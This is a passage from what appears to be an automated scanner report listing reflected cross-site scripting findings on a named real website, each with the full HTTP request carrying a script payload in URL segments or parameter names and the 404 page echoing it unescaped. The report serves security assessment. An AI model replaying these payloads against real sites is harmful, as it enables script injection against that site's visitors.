HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/?2ae58<script>alert(1)</script>7f506c4521a=1 was not found on this server.</p>
...[SNIP]...

2.1870. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d868c<script>alert(1)</script>84e2a7b949d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild868c<script>alert(1)</script>84e2a7b949d/23/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild868c<script>alert(1)</script>84e2a7b949d/23/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1871. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df3ea<script>alert(1)</script>583a5f36a21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23df3ea<script>alert(1)</script>583a5f36a21/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23df3ea<script>alert(1)</script>583a5f36a21/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1872. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 381cb<script>alert(1)</script>d69913df9cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes381cb<script>alert(1)</script>d69913df9cc/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes381cb<script>alert(1)</script>d69913df9cc/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1873. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d2ce<script>alert(1)</script>ed8e236e75f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos7d2ce<script>alert(1)</script>ed8e236e75f/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos7d2ce<script>alert(1)</script>ed8e236e75f/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1874. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fb45b<script>alert(1)</script>47b25d85fcd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/imagesfb45b<script>alert(1)</script>47b25d85fcd/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/imagesfb45b<script>alert(1)</script>47b25d85fcd/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1875. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 43dc7<script>alert(1)</script>ba1ccbfc722 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating43dc7<script>alert(1)</script>ba1ccbfc722/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating43dc7<script>alert(1)</script>ba1ccbfc722/3half.gif was not found on this server.</p>
...[SNIP]...

2.1876. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7eb3e<script>alert(1)</script>91efcaeafa0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/3half.gif7eb3e<script>alert(1)</script>91efcaeafa0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/3half.gif7eb3e<script>alert(1)</script>91efcaeafa0 was not found on this server.</p>
...[SNIP]...

2.1877. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2bf61<script>alert(1)</script>8e87fe98bb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/3half.gif?2bf61<script>alert(1)</script>8e87fe98bb9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/3half.gif?2bf61<script>alert(1)</script>8e87fe98bb9=1 was not found on this server.</p>
...[SNIP]...

2.1878. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53edc<script>alert(1)</script>7e9382b82f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail53edc<script>alert(1)</script>7e9382b82f4/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail53edc<script>alert(1)</script>7e9382b82f4/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1879. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9de3<script>alert(1)</script>59c27e7c7a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23c9de3<script>alert(1)</script>59c27e7c7a7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23c9de3<script>alert(1)</script>59c27e7c7a7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1880. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93b99<script>alert(1)</script>4caa143d723 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes93b99<script>alert(1)</script>4caa143d723/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes93b99<script>alert(1)</script>4caa143d723/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1881. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b51c1<script>alert(1)</script>0be91638216 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmosb51c1<script>alert(1)</script>0be91638216/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmosb51c1<script>alert(1)</script>0be91638216/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1882. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 96b38<script>alert(1)</script>40b66577c74 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images96b38<script>alert(1)</script>40b66577c74/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images96b38<script>alert(1)</script>40b66577c74/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1883. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 662b8<script>alert(1)</script>d7b34cffffc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating662b8<script>alert(1)</script>d7b34cffffc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating662b8<script>alert(1)</script>d7b34cffffc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1884. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 505cc<script>alert(1)</script>8d119cfe1af was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/search.php505cc<script>alert(1)</script>8d119cfe1af?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php505cc<script>alert(1)</script>8d119cfe1af?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1885. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9766b<a>b38f203fbb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search9766b<a>b38f203fbb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search9766b<a>b38f203fbb&opt=2 was not found on this server.</p>
...[SNIP]...

2.1886. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 22141<a>a857a69c86a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...22141<a>a857a69c86a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php?keyword=search...22141<a>a857a69c86a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1887. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d83cb<script>alert(1)</script>1d15592a767 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&d83cb<script>alert(1)</script>1d15592a767=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
